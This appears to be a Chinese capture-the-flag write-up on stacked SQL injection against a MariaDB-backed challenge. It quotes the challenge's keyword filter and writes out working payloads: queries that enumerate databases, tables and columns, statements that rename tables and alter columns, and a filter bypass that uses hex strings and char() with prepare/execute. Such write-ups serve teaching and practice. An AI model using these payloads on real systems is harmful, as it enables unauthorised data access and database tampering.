先添加一个单引号,报错,错误信息如下:
error 1064 : You have an error in your SQL syntax; check the manual that corresponds to your MariaDB server version for the right syntax to use near ''1''' at line 1
接着测试–+注释,发现被过滤,然后使用#注释,可行
用order by语句判断出有两个字段,接着使用union select 爆字段,发现这个时候出现了如下提示:
return preg_match("/select|update|delete|drop|insert|where|\./i",$inject);
发现上面的关键字都被过滤不能使用了,没法进行注入,这个时候尝试一下堆叠注入
这里讲解一下堆叠注入
堆叠注入原理:
在sql语句中以;表示一个语句的结束,如果一个sql语句结束后再接着一个sql语句,就会执行这两条sql语句
演示如下:
此时数据库里面存着如下账号密码的表
我们来试一试一次性执行两条sql语句,第一条是删除id为14的用户,第二条是新建id为13的用户并赋予账号密码
发现成功执行两条sql语句
假设有一条sql语句如下,利用堆叠注入效果如何呢
select xxx from table_name where id='$id' limit 0,1
注入后:
select xxx from table_name where id='$id';show databases;#' limit 0,1
因为是单引号闭合,所以添加单引号后加分号,前面就是一条完整的sql语句select xxx from table_name where id='$id';
后面的sql语句就是show databases;
#
注释掉后面的limit 0,1
现在回到这道题,利用堆叠注入,查询所有数据库
1';show databases;#
查询所有表
1';show tables;#
查询words表中所有列
1';show columns from words;#
查询1919810931114514
表中所有列
1’;show columns from `1919810931114514`;#(字符串为表名操作时要加反引号)
根据两个表的情况结合实际查询出结果的情况判断出words是默认查询的表,因为查询出的结果是一个数字加一个字符串,words表结构是id和data,传入的inject参数也就是赋值给了id
方法一(修改数据库结构):
这道题没有禁用rename和alert,所以我们可以采用修改表结构的方法来得到flag
将words表名改为words1,再将数字名表改为words,这样数字名表就是默认查询的表了,但是它少了一个id列,可以将flag字段改为id,或者添加id字段
1';rename tables `words` to `words1`;rename tables `1919810931114514` to `words`; alter table `words` change `flag` `id` varchar(100);#
这段代码的意思是将words
表名改为words1
,1919810931114514
表名改为words
,将现在的words
表中的flag
列名改为id
然后用1' or 1=1 #
得到flag
方法二(mysql预处理):
语句一:
1';SeT@a=0x73656c656374202a2066726f6d20603139313938313039333131313435313460;prepare execsql from @a;execute execsql;#
(那一串是select * from `1919810931114514`的十六进制)
语句二:
1';SET @sql=concat(char(115,101,108,101,99,116)," * from `1919810931114514`");PREPARE sqla from @sql;EXECUTE sqla;#
(char(115,101,108,101,99,116)
是把s e l e c t的ascii码转换为字符连接起来,再把后面的拼接起来就成了select * from `1919810931114514`)